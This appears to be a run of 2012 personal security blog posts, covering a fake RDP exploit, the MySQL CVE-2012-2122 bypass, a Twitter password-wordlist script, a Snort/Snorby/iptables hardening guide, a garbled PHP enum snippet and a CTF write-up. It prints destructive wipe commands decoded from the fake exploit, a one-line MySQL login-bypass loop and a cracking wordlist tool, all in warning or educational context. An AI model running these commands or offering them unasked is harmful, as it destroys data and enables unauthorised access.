Not that long ago we saw the big hype around the Windows Remote Desktop Protocol exploit. The story was that the RDP service had a vulnerability allowing possible remote code execution without authentication. In no time websites where up talking about the current progression of the vulnerability analysis. Until today still no workable exploit has been made released (http://istherdpexploitoutyet.com/) – as far as I’m aware.

What was interesting to see was that in the meantime fake exploits stated to show up. One of the examples can be found at: http://pastebin.com/GM4sHj9t

At first, this really looked like a legit exploit. The only problem is that the hex data in ‘shellcode’ translate into the following lines:

__import__('os').system('del /s /q /f C:windowssystem32* > NUL 2>&1')
if 'Win' in __import__('platform').system()
else __import__('os').system('rm -rf /* > /dev/null 2>&1')
#hi there ^_~ feel free to spread this with the rm -rf
#replaced with something more insidious

//Just fyi I added some returns to make this readable. Originally this is one line of code.

Relying on people who have no clue what they are doing or simply run everything they get there hands on, this is a great way to mess with people and/or setup a small botnet.

So think and analyze before you run shit. ;)

Cheers, Ruben.

A while ago the ISD podcast talked about a blog-post a guy had made. What this guy did is, he is using twitter to create a wordlist while searching for a keyword. This wordlist can then be very useful for cracking passwords. The script does a query for the latest tweets using your search criteria and uses all the tweets to create a wordlist. The original post can be found at: http://7habitsofhighlyeffectivehackers.blogspot.com.au/2012/05/using-twitter-to-build-password.html

The script is good fun and so easy its a bit funny. Using his idea, I improved his script a little bit allowing you to put in multiple keywords.

#!/bin/bash

for var in "$@"
do
    echo "Searching for $var, saving results in $1.txt"
    wget -q "http://search.twitter.com/search.json?q=$var&rpp;=500"
    cat search.json* | tr "," \n | grep "^"text" | cut -d""" -f4- | tr " " \n | sed s/"//g | sed s/^#//g | sed s/^@//g | grep -v "^http:" | grep -v "\\" >> $1.txt
done

cat $1.txt | sort | uniq > $1.unique.list

echo "Results:"
wc -l ./$1.unique.list

rm -f search.json*
rm -f $1.txt

Definitely check http://7habitsofhighlyeffectivehackers.blogspot.com.au this guy has some pretty cool stuff.

Cheers, Ruben.

On Sunday an exploit got released that allows you to by-pass the authentication procedure in certain MySQL installations.The bug that is being exploited here allows you to login without a correct password.

In short: The vulnerability makes it possible to exploit a MySQL system using a single bash script line:

for i in `seq 1 1000`; do mysql -u root --password=incorrect-password -h 127.0.0.1 2>/dev/null; done

If successful, this command will give you a mysql console (mysql>). In this case with root privs.

By default MySQL does not allow connections from external systems. If you changed this make sure you specify who is allowed to connect to your service. The best way to control this is by setting up your iptables. White-list IP addresses that you allow to connect to your system/service. Also, if there is no need for external systems to connect to your MySQL service (mostly the case when running MySQL for a website; exception excluded) than this – external access – should be disabled. Only allow access to your MySQL service from localhost/127.0.0.1

This exploit is childsplay and it wouldn’t surprise me if we are going to see a lot of compromised systems over-night. Make sure your system is not one of them!

More information about the flaw can be found at: https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

Cheers.

Snorby 2.5.0 was just released:

  • New Search UI

  • New saved search feature

  • New Session View

  • Fixed classification logic

  • Mass classification Job Queue optional

  • Major Bug fixes / UI Improvements

  • Note: Make sure to run bundle exec rake snorby:update

    • id column added to event table

    • Agg view table added

    • events_wtih_join view added

Here is how you update your current installation:

  1. Backup all your own config files (just to be sure move them outside your snorby dir)
  2. git pull origin master
  3. bundle install —deployment
  4. Move your config files back
  5. rake snorby:update
  6. service apache2 restart

Done.

Cheers, Ruben.

When securing an asset it is important to remind yourself about the fact that an extremely well secure environment is not always the best solution. Before determining what security measures are going to be implement you should always ask yourself how important the security for the particular data is. One of the most important questions during this process should be: “how valuable is the information”. The data you’re protecting can be customer data, source code or a database containing application information (doesn’t have to have a high value). The protection for different types of data will change when the value increases. Example: government secrets have a much higher value (so are much better secured) than a database containing forum threads discussing every day topics.

Other example: when working on a web application the application itself can hold a lot of data. But is this data important? How useful would this information be to an attacker? The best argument I ever heard regarding this topic is: “If the attacking effort is higher than the value of the asset, it is more likely the data will be left alone”. This basically means that when the value of the data increases you’ll have to make it more difficult for an attacker to get it. Because as we all know: it is not a question of ‘if’ but ‘when’. So when securing an asset, you need to decide if you’re going to use a easy to use but less complete monitoring system or a complicated IDS (where you’ll probably have to get one of your employees educated), go back to the question “How valuable is the data I’m securing?”. Because sometimes you don’t need a complicated IDS but simply a decent configuration in your iptables.

One last note, do not mistake my argument with solving or preventing misconfigurations. Misconfigurations are issues you should take care of regardless of the value of the data.

Cheers, Ruben.

Ok, so a lot of the time you see servers running nothing but their OS. No logs are checked, no IDS is running, no iptables have been configures and no additional check/monitoring is performed.

In this post I’ll describe in a decent but short and hopefully clear way how you can secure your server using a couple of tools. I’ll be describing three way’s that will make a significant difference in the security of your server.

When securing a server the following things are important: 1. Block unwanted traffic 2. Take care of hosts that generate the unwanted traffic 3. Monitor for malicious traffic 4. Make sure your security services are running

Well to be fair this list probably is missing some points but right now I’m to lazy to write more about this subject than I’m already doing in this post….

With these 4 points you are taking care of most of the security issues you’re server has to deal with every single day. The tools I chose for this are Snort (IDS 2.9.2.1), IPTables (Firewall) , Artillery (Server hardening tool (0.4 alpha)).

Snort is a tool that does package analysis. It uses a set of rules to determine if a packet (or serie of) is malicious. IPtables come most of the time with the default installation of most *UNIX systems and functions as a firewall. It uses a chain containing rules that define what traffic is allowed (ACCEPT) or disallowed (DROP or REJECT). Artillery is a fairly new tool developed by David Kennedy (ReL1K) and uses a couple of techniques to determine if your server is running a save configurations. But, and this is in my opinion the fun feature: it runs a couple of “honeypot” ports. This means that Artillery sets up a socket listener on a couple of ports. The minute someone connects to this port Artillery sends a random data string to the user and adds a rule to your iptables to DROP all traffic from this host. This is a great way to block suspicious IP addresses.

Now that we know what tools we are going to use, here is how you do it:

To install snort just find the installation doc on the snort website. These docs are perfectly fine so I’m not going to write a lot about installing snort. – http://snort.org/docs

Now that snort is running you’ll need to install a decent interface that will give you a report on what alerts have been triggered by snort. A very nice project that is under active development is Snorby (http://snorby.org/). Snorby is an easy to use interface for snort. The installation of snorby is a bit tricky if you have no experience with ruby (like me). When installing Snorby make sure you download and compile all the dependencies (don’t use your repositories, I think Snorby uses some newer libs). Here is a snort description of what I did:

#Installing the needed dependencies
sudo apt-get install gcc g++ build-essential libssl-dev libreadline5-dev zlib1g-dev linux-headers-generic libsqlite3-dev libxslt-dev libxml2-dev imagemagick libmysqlclient-dev libmagick9-dev git-core mysql-server wkhtmltopdf
#Getting the latest ruby (when writing 1.9.2 was the latest release) and compile it
sudo wget ftp://ftp.ruby-lang.org//pub/ruby/1.9/ruby-1.9.2-p0.tar.gz
tar -xvzf ruby-1.9.2-p0.tar.gz
cd ruby-1.9.2-p0/
sudo ./configure --prefix=/usr/local/ruby && sudo make && sudo make install
#Adding ruby to your environment
sudo nano /etc/environment
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/ruby/bin"
source /etc/environment
#Linking the binaries
sudo ln -s /usr/local/ruby/bin/ruby /usr/bin/ruby
sudo ln -s /usr/local/ruby/bin/gem /usr/bin/gem
#Installing the neede ruby dependencies
sudo gem install tzinfo builder memcache-client rack rack-test erubis mail text-format bundler thor i18n sqlite3-ruby
sudo gem install rack-mount -v 0.4.0
sudo gem install rails -v 3.0.0
#Linking the binraries
sudo ln -s /usr/local/ruby /bin/rails /usr/bin/rails
sudo ln -s /usr/local/ruby /bin/rake /usr/bin/rake
#Getting the snorby code
git clone git://github.com/Snorby/snorby.git
#Update your gemfile (and maybe also gemfile.lock) in the snorby dir. Because you probably run a different version of gem (just update the value to your current version)
update gemfile (and gemfile.lock?)
#Build snorby (the --deployment was very import for me otherwise bundle stated to build and require heaps of libs that I did not need)
bundle install --deployment

After this you’re good. Running Snorby with passenger (run ruby on rails apps via Apache) is very useful and doesn’t require you to start the service every time (this is also recommended by Snorby).

Now you have Snort and Snorby running it is time to take care of some iptables. I will not talk about configuring Snort, first of all, I’m still trying to figure that out, and secondly, it depends on where you are running your IDS. Tuning of the rules for every individual system is important to reduce the amount of false-positives (alerts).

Next just install and configure Artillery. The good thing about artillery is that it is quick and brutal. Someone connects to a port that does not run anything? Artillery considers you a malicious user. I think this is very effective considering the fact that there is absolutely no reason for anyone to connect to that port. (unbanning is easy by the remove_ban.py script). I’m not going to explain how to configure Artillery because this is so dirty easy that any text as an addition to the current comments in the config file of Artillery are useless haha. Just do an svn checkout (https://www.secmaniac.com/download/) and just read the readme and config file comments. You’ll be fine ;)

IPtables are dirty easy. All you need to do is configure what you want to ACCEPT, DROP or REJECT – the difference between DROP and REJECT is that with REJECT you notify the client about the fact that the network traffic has been dropped. I build a short script that basically uses a white listing approach. I DROP all traffic by default, and then I whitelist all the traffic that I allow. Here is my script:

#!/bin/sh
# Make sure to run this as root (sudo)
# My system IP/set ip address of server
SERVER_IP="<your-server-ip>"
ARTILLERY="/<path-to>/artillery/restart_server.py"

# Showing you some data so you can recover if something went wrong
echo "*******START-CURRENT-IPTABLES*******"
iptables -L -v -n
iptables -L -v -n -t nat
echo "*******END-CURRENT-IPTABLES*******"
echo ""
echo "*******BAKCUP*******"
iptables-save
echo "*****END-BACKUP*****"

# Flushing all rules
# We leave the artillery chain alone. Artillery will deal with this on its own when restared at the end of this file
echo "Flushing INPUT, OUTPUT, FORWARD and the nat chain."
iptables -F INPUT
iptables -F OUTPUT
iptables -F FORWARD
iptables -F LOGGING
iptables -t nat -F
#Only if applicable iptables -t mangle -F
#Only if applicable iptables -t mangle -X

# Setting default filter policy. Basically, drop all unless said otherwise
echo "Setting default policy (DROP)"
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#Dropping all ipv6 traffic
echo "I see no need for ipv6 support"
ip6tables -P INPUT DROP
ip6tables -P OUTPUT DROP
ip6tables -P FORWARD DROP

# Allow unlimited traffic on loopback
echo "Allowing loopback (lo)"
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

# Allow dns lookups
echo "Allow all traffic to and from DNS servers"
for dnsserverip in `grep nameserver /etc/resolv.conf | sed 's/.* //'` ; do
        iptables -A OUTPUT -d $dnsserverip -p udp -o eth0 --dport 53 --sport 1024:65535 -j ACCEPT
        iptables -A INPUT -s $dnsserverip -p udp -i eth0 --sport 53 --dport 1024:65535 -j ACCEPT
done

# Allow outgoing ping
echo "Allowing outgoing ping packages"
iptables -A OUTPUT -p icmp --icmp-type 8 -s $SERVER_IP -d 0/0 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p icmp --icmp-type 0 -s 0/0 -d $SERVER_IP -m state --state ESTABLISHED,RELATED -j ACCEPT

# Allow all outgoing http traffic
echo "Allow all outgoing HTTP and HTTPS traffic"
iptables -A OUTPUT -o eth0 -p tcp --dport 443 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i eth0 -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i eth0 -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT

# Allow incoming ssh only
echo "Allowing ssh traffic on port [port]"
iptables -A INPUT -i eth0 -p tcp --dport [port] -m state --state NEW,ESTABLISHED -j ACCEPT #Accepting incomming ssh traffic (new and established connection)
iptables -A OUTPUT -o eth0 -p tcp --sport [port] -m state --state ESTABLISHED -j ACCEPT #Accept outgoing (established) connections

# Allow NTP (time) client
echo "Allowing NTP (time) client"
iptables -A OUTPUT -p udp --dport 123 -j ACCEPT
iptables -A INPUT -p udp --sport 123 -j ACCEPT

#Reject packages we do not want to log
#DHCP traffic
iptables -A OUTPUT -o eth0 -p udp --dport 67 --sport 68 -j DROP
iptables -A INPUT -i eth0 -p udp --dport 67 --sport 68 -j DROP
#Broadcast traffic
iptables -A OUTPUT -s 0/0 -d 255.255.255.255 -o eth0 -j DROP
iptables -A INPUT -s 0/0 -d 255.255.255.255 -i eth0 -j DROP
iptables -A OUTPUT -s 0/0 -d xx.xx.xx.255 -o eth0 -j DROP
iptables -A INPUT -s 0/0 -d xx.xx.xx.255 -i eth0 -j DROP

#Making sure artillery can still work, these are the configured ports in the artillery config file
echo "Allowing traffic on the following ports: <your-artillery-honeypot-ports>. Now artillery can do its job"
#Repeat the following two lines for every honeypot-port you have configured in artillery
iptables -A INPUT -i eth0 -p tcp --dport 21 -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 21 -j ACCEPT

#Only use this if you run the script manually
echo "Restarting artillery"
python $ARTILLERY

# Log droped packages
echo "Enabling logging..."
iptables -N LOGGING
iptables -A INPUT -j LOGGING #To log potential attackers
iptables -A OUTPUT -j LOGGING #Logging purposes in case we need to allow a service
iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables Packet Dropped: " --log-level 4

echo "Firewall configuration done. Firewall is running"

If you want to set this script at startup just add it (in ubuntu) to the following directory: /etc/network/if-pre-up.d/ Artillery will initialize all the other rules on startup, so you don’t need to worry about that.

The last part you should do is configure logwatch to send you a daily log file. This should give you all the additional information on what is happening on your server.

Also simply adding a cron job that checks if snort and artillery are running (if not send you an email or something like that) would be a good idea.

So what did we accomplish with this? 1. We monitor all incoming and outgoing traffic for malicious traffic. 2. We have a good reporting system for these alerts. 3. We have a firewall running. 4. We have a couple of ports functioning as a kind of ‘trap’ to catch malicious IP addresses.

Ok, so that was a lot of info in a very short amount of time. Still, I hope this post was useful, any question just leave them in the comment section and I will get back to you as soon as possible.

Cheers, Ruben.

Today I was looking for a way to build an Enum in PHP. To my surprise, this is not really supported (yet). There is ‘SplEnum’. But this object is apparently ‘experimental’. So after some looking around, here is a way of creating an Enum (like) object in PHP:

class {
    private $value = ::;

    const  = ;
    const  = ;
    enz...

    //Get the correct constant name related to the given input value ($i)
    public function ($i){
        $reflectionObj = new ReflectionObject($this);
        //Loop trough constants to find the right value
        foreach( $reflectionObj->getConstants() as $constant=>value ){
            if($value == $i){
                $this->value = $constant;
                return constant("::".$constant)
            }
        throw new Exception("Value (" . $i . ") not found in ");
    }

    //Just making sure the object is printed correctly when asked for
    public function __tostring(){ return $this->value; }
}

Of course there are multiple way’s of building an Enum ‘like’ structure with associated array’s or DEFINE(‘’) But lets be honest, this is way cooler!

Unfortunately I haven’t found a way yet of making it a Class you can inherit from because you’ll have to do a trick with the super function (parent::functionName()). And those don’t work most of the time (if it comes to usability of your object).

Do you know a better way? Please do let me know because I think this is really a feature that is missing in the current PHP release.

Cheers, Ruben.

A while ago the dutch KLPD (Korps landelijke politiediensten; the National Police Services Agency in the Netherlands) launched a cyber challenge for recruiting new skilled employees. Although I’m not living in the Netherlands and/or looking for a new job at the moment, I was a bit bored and wanted to take a look at this challenge to see what my skills were. In this blog post I’ll tell you how I did it.

Hopefully it will help you if you got stuck during the challenge, had no idea how to start or are just interested in how you could have solved this challenge.

I divided this blog post in 3 parts: 1. The easy part :P (pcap analysis) 2. A zip file with a password? Now what? (zip file analysis) 3. Android app/JAVA analysis 3.1 Part 1: Me like looking at source code. (source code analysis) 3.2 Part 2: What the hell are these messages? (crypto challenge)

Ok, here we go.

  1. The easy part – Pcap Analysis When starting the challenge you start with a pcap file (http://tweakers.net/advertorials/cybercrimechallenge). This is a file containing the raw network traffic from an network tap. A great tool for looking at this file is Wireshark. I wanted to do a quick analysis on the pcap. Because I didn’t know where I was looking for and I’m not a Wireshark guru I decided to go in a different direction. There are two tools you can use for this. For Windows you can use “Network Miner” this is a great tool if you like to take a look at what kind of data has been collected. Although this is not the tool I prefer to use for this. I’m a UNIX guy and I love the console (GUI’s are for people who want to get RSI). So an other great tool is ‘honeysnap’ (for more info about honeysnap go to https://projects.honeynet.org/honeysnap/; just remember that you have to change the IP addresses in the honeysnap config file before you are able to run a analysis).

One quick note: Because you need the IP addresses to config honeysnap you need to find all the ip addresses in the pcap. You can do this via wireshark. I did this by using a custom tool I also use for log analysis. I found the IP addresses used in the pcap file is by running my tool using the following regex:

"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).
(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"

There are probably other methods to find all the IP addresses in a file but this is how I did it ;)

After running the following command: honeysnap -c honeynet.cfg klpd.pcap (download: honeynet.cfg) you get a list of results where the following parts are the most interesting:

Analysing file: klpd.pcap

Pcap file information:
    File name: klpd.pcap
    Number of packets: 5518
    File size: 4166353 bytes
    Data size: 4078041 bytes
    Capture duration: 260.222535133 seconds
    Start time: Fri Jan 20 01:51:46 2012
    End time: Fri Jan 20 01:56:06 2012
    Data rate: 15671.3598917 bytes/s
    Data rate: 125370.879133 bits/s
    Average packet size: 739.043312794 bytes

IP packet summary for common ports:

Filter                                      Packets
Total IPv4 packets:
host 11.1.102.55 and ip                           0
host 74.50.110.120 and ip                       978
host 92.122.217.80 and ip                        27
host 203.0.113.59 and ip                        261

Total TCP packets:
host 11.1.102.55 and tcp                          0
host 74.50.110.120 and tcp                      978
host 92.122.217.80 and tcp                       27
host 203.0.113.59 and tcp                       261

Total OTHER packets
host 11.1.102.55 and not udp and not tcp and not icmp          0
host 74.50.110.120 and not udp and not tcp and not icmp          0
host 92.122.217.80 and not udp and not tcp and not icmp          0
host 203.0.113.59 and not udp and not tcp and not icmp          6

Inbound HTTP packets:
dst host 11.1.102.55 and dst port 80              0
dst host 74.50.110.120 and dst port 80          281
dst host 92.122.217.80 and dst port 80           18
dst host 203.0.113.59 and dst port 80            80

Counting incoming connections for 11.1.102.55
Counting incoming connections for 74.50.110.120
Counting incoming connections for 92.122.217.80
Counting incoming connections for 203.0.113.59

Counting outgoing connections for 11.1.102.55
Counting outgoing connections for 74.50.110.120
Counting outgoing connections for 92.122.217.80
Counting outgoing connections for 203.0.113.59

Extracting DNS data to file

Extracting all flows

Extracting from HTTP

HTTP summary for 74.50.110.120
requested_files: No files seen
20 requests served by honeypot

HTTP summary for 92.122.217.80
requested_files: No files seen
2 requests served by honeypot

HTTP summary for 203.0.113.59
requested_files: No files seen
4 requests served by honeypot

When looking closely at the results honeysnap generated you can see that there are 4 ip addresses where honeysnap created a folder for. When analyzing the data in each folder you’ll find out that the folder of “203.0.113.59” contains the most interesting data.

  1. A zip file with a password? Now what? – Zip file analysis With interesting I’m of course referring to the zip file “Off%20the%20Platter%20Source.zip.2”. When opening this file looking at the file names is not an issue and shows you that you are working with a zip file that contains the source code of an java application (an android app to be precise because you also found an “apx” file in the pcap analysis). As you probably can guess, the files contain the source code for the fictional botnet described in the challenge. Opening the zip files goes good but extracting the files is an issue because its password protected. But after a lucky guess (kuch botnet kuch) the zip file extracts and you can look at all the files. When looking at all the files you’ll find that the following path will bring you to the src of the application: “Off The Platter/src/com/botnet/offtheplatter/” *An other method for doing this is a dictionary attack. In the upcoming day’s I’ll try to release my own simple python script that takes care of this for you.

  2. Android app/JAVA analysis Now that you have the zip file content extracted and can look at the source it is time to do some analysis. Let roll:

3.1 Me like looking at source code. (source code analysis) When first looking at the source you’ll see a couple of file’s. It is a very small application and a quick analysis will show you that the application is getting its messages from a forum (http://193.200.198.84:51372/). When following the links from the source code you’ll end up at a page that requires a password. Again, in the source code this password is provided. The only thing that is done to the string that can be found in PASS (found in Forum.java) is a base64 decode. Once you decoded the string yourself (think of ‘online base64 decode’ or the lovely UNIX command “base64 -d ” where the file of course contains the base64 encrypted password) you are able to login to the forum. This is where you’ll find the encrypted messages.

3.2 Part 2: What the hell are these messages? (crypto challenge) Again we go back to the source code and we are able to see that the messages are decrypted using the following algorithm:

        @Override
        protected String doInBackground(Context... params) {
                int i, j;
                for (i = 0; i < this.messages.size(); i++) {
                        for (j = 0; j < 8; j++) {
                        Message m = this.messages.get(i);
                        m.decrypt(this.password, j);
                        //All the code from here to the END comment is completely useless.
                        //Do leave it out, it is time consuming an only generating output
                            try {
                                        Thread.sleep(250);
                                } catch (InterruptedException e) {
                                }
                            float percent = (float)(i*8+j)/(float)(this.messages.size() * 8);
                            System.out.println(percent);
                            percent = percent * 100;
                        this.publishProgress(Math.round(percent));
                        }
                        //END
                }
                //REMOVE, app specific
                this.progress.dismiss();
                return null;
                //END
        }

Below you’ll see the decrypt function that is called:

public void decrypt(String password, int bit) {
        String result = "";
        int i;

        if (password.length() == 0) {
                this.message = this.COULD_NOT_DECRYPT_NO_PASSWORD;
                return;
        }

        for (i=0; i

Basically after analysis the code you’ll see that the only interesting and real encryption part is taking place is the XOR. Also when you look at the function above you’ll see that every character is encrypted and than the stream/block cipher continues with the next char. This is (I think) a classic implementation of a XOR stream cipher. But… XOR is a very weak encryption algorithm if you know what the outcome should be (XOR is only good when the key is the same length as the message and no repetitions can be found in the message). Again, if you look at the source code you’ll see that the decryption algorithm decides if the decryption was successful if the string starts with “ENCRYPTION”. This is great! Because we now have the encrypted message and the string a decrypted message should start with. As you probably also can see all the encrypted messages start with the following pattern: “LyJwNh9iPil3”. Is it fair to assume that this is the encrypted version of the string “ENCRYPTED”? That’s right, we can assume that indeed. Ok, to come back at the weakness a XOR encryption algorithm has, XOR is a operator that is also used for data recovery. That means that you are able to lose data and recreate it with a data recovery file. The way this works is as follows: 0111 0101 – Data 1

0101 0011 – Data 2

0010 0110 – XOR between Data 1 and Data2

Now we lose Data2. We can recover this by xor’ing the data with Data1:

0111 0101 – Data 1

0010 0110 – Previously calculated XOR

0101 0011 – XOR between Data1 and XOR

Isn’t that awesome? Well, not if you are encrypting data of course because we know the result is ENCRYPTION we can exploit this vulnerability in the XOR encryption and do the following: Encrypted data: LyJwNh9iPi

Decrypted message: ENCRYPTION

Encryption key: KEY (you can find that one yourself :P)

For you who payed attention i removed ‘l3’ (the last two chars) from the pattern we found at the beginning of the string. Because it is a stream cipher and its only encrypting a single char we have to ignore these two chars to prevent getting the wrong key. It is not the same length as ENCRYPTION

Done! We now have the message we need.

Cheers, Ruben.

In the upcoming posts I’ll be writing about pentesting (Penetration testing or also known as a vulnerability assessment). We will be looking at the process that goes with a pentest. We will talk about vulnerabilities, exploits and reporting (pre- and post-exploitation). Hopefully I’m able to give you plenty of examples that will help you understand the process better.

Before we start I have to inform you that I’m not a certified pentester nor do I have any business experience regarding pentest. This is pure out of interest in this subject.

I’ll be sharing my personal knowledge and experience about pentesting. Also I’ll describe what I think is important before, during and after a pentest. In most posts (or video’s) people write how an exploit works or how to exploit a system. But before finding and exploiting a vulnerability you should already have performed a decent amount of research. Also reporting a vulnerability is a skill every pentester needs.

What can you expect in the upcoming blog posts? 1. Business Case: In this part we will talk about the moment where you and your client start talking about performing a pentest. What type of vulnerabilities tests are there? What type is best for you and your client? What are we testing? And what to do about the legal issues? 2. Information Gathering I think that the key to a good pentest is becoming an expert on the system you are attacking. You have to know the system better than the developer or system admin, or at least as close to this as possible. That is why understanding what you are dealing with is key to a pentest. 2. Vulnerability Assessment This is where stuff gets interesting. All the paperwork is done and now we get to do some fun stuff. How do we find vulnerabilities? What scanners can I use, and what should I do with all my scanning results? 3. Exploitation Of course after finding a vulnerability we need to exploit it. 4. Maintaining Access After we exploited a vulnerability we would like to maintain access for later research (further network/system penetration). In this part we will talk about the methodologies to maintain access to a system (backdoor, user-accounts, key logging). 5. Results: Of course this assessment has to have some useful results for your client. In this part we will look a couple of documents that show a customer in a good way what is wrong and how they can fix it.

Hope you enjoy the upcoming posts. Do you have any suggestions, tools, tips, documents or other stuff I can use? Just leave it in the comments.

Cheers, Ruben.